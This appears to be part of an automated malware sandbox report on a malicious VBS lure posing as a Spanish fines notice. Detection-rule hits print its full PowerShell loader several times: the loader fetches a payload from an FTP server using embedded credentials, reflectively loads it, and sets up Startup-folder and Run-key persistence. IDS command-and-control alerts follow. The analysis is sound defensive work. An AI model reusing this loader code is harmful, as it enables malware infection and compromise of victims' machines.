                        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_nyj
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", CommandLine|base64offset|contains: b~'r*', Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs", ProcessId: 4956, ProcessName: wscript.exe
                        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1088, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\", ProcessId: 4836, ProcessName: cmd.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1088, TargetFilename: C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -comman
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:42:24.538051+020020331321Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:42:10.278503+020028033053Unknown Traffic192.168.2.54970876.76.21.22443TCP
                        2024-09-24T23:42:13.919461+020028033053Unknown Traffic192.168.2.54971176.76.21.22443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:43:16.816363+020028255661Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-09-24T23:42:30.780426+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:20.415585+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:21.823270+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:26.275661+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:26.448004+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.447593+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.572536+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.874346+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.879287+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.884284+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.890574+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.895424+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.900265+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.905133+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.909984+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.917729+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.922522+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:27.938041+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.006779+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.078828+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.083729+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.089272+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.094773+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.102648+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.107699+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.112675+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.118220+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.125430+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.130615+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.135572+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.141947+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.146951+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.151855+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.156685+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.162693+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.167715+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.189826+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.194891+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.199734+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.204631+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.209478+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.215309+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.220171+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.225084+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.232142+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.237093+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.242013+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.246929+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.251785+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.260716+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.265623+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.270502+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.281059+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.320454+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.325448+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.330529+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.336799+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.344731+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.350336+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.356134+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.362179+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.368022+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.393404+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.399029+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.404239+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.410456+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.415443+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.420374+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.426867+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.431776+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.436637+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.443695+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.448627+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.453477+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.458417+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.463317+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.468119+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.473049+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.477902+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.482840+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.487734+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
                        2024-09-24T23:43:28.493974+020028255641Malware Command and Control Activity Detected192.168.2.55614546.246.14.52054TCP
